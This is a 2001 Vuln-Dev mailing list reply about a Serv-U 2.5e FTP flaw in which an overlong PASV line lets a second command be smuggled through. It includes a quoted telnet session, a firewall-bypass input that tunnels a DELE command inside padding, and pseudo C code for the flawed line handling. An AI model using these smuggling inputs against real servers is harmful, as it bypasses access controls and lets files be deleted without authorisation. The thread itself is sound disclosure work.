Vulnerability Development mailing list archives

Re: serv-u 2.5e

From: BORBELY Zoltan <bozo () andrews hu>
Date: Tue, 24 Jul 2001 09:48:12 +0200

On Mon, Jul 23, 2001 at 07:37:38PM +0000, perkere stinker wrote:

log in, issue a PASV [buf] where buf is 507 bytes, after that you can issue 
a new command all in the same line. Can this be exploited anyway? Does it 
work on other versions? Is this pure crap? I dont know. Guess thats what 
vuln-dev is for?

example:

[foo@bar foo]$ telnet serv-u-server 21
Trying 193.89.248.81...
Connected to serv-u-server.
Escape character is '^]'.
220 Serv-U FTP-Server v2.5e for WinSock ready...
user perkere
331 User name okay, need password.
pass stinker
230 User logged in, proceed.
PASV 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWD
 
upload
227 Entering Passive Mode (193,89,248,81,7,177)
250 Directory changed to /f:/Download/upload

End example


Is the command really important? I think I've discovered the same bug about
one year ago, but I had checked the wu-ftpd. This "feature" can be really bad.
E.g. you are using application level firewall and you configured your gateway
to disable the delete command. If the gateway doesn't check the proper line
termination (<CR><LF>) after the command you can tunnel a disabled command
inside an allowed command:

CWD AAAAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAADELE foo

I had sent a mail to CERT but nothing happened. I had no time that time so
the story had ended. I've checked to wu-ftpd and proftpd and both are affected.
I think most of the ftp daemons are affected.

It's very easy to implement this bad behaviour. The following pseudo C code
fragment will show a tipical bad approach:

        while ( fgets(buff,sizeof(buff),f) != NULL )
        {
            /* remove line termination if any */
            ...

            handle_command(buff);
        }

Current thread:

serv-u 2.5e perkere stinker (Jul 23)
- Re: serv-u 2.5e Vladimir Dubrovin (Jul 24)
- Re: serv-u 2.5e BORBELY Zoltan (Jul 24)
- <Possible follow-ups>
- re: serv-u 2.5e Obscure - (Jul 24)